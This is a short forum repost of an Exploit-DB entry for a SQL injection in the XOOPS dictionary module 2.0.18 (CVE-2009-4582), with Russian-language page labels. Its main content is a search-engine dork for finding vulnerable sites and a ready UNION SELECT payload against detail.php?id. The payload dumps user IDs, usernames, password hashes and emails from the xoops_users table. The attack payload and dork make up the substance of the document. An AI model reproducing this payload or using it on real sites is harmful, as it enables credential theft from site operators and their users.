Exploit XOOPS Module dictionary 2.0.18 - 'detail.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10807
Проверка EDB
  1. Пройдено
Автор
PALYO34
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-4582
Дата публикации
2009-12-30
Код:
##########################################
#
#  XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
#
#  XOOPS Version:  XOOPS 2.0.18 
#
#  http://www.xoops.org/modules/repository/
#
##########################################
#
# AUTHOR : Palyo34
#
# HOME : http://www.1923turk.biz
#
#
###########################################
#
# DORK  : allinurl: "modules/dictionary/detail.php?id"
#
###########################################
#   
#   EXPLOIT :
#
#     modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pass,email),5,6+from+xoops_users--
#
##############################################
 
Источник
www.exploit-db.com

Похожие темы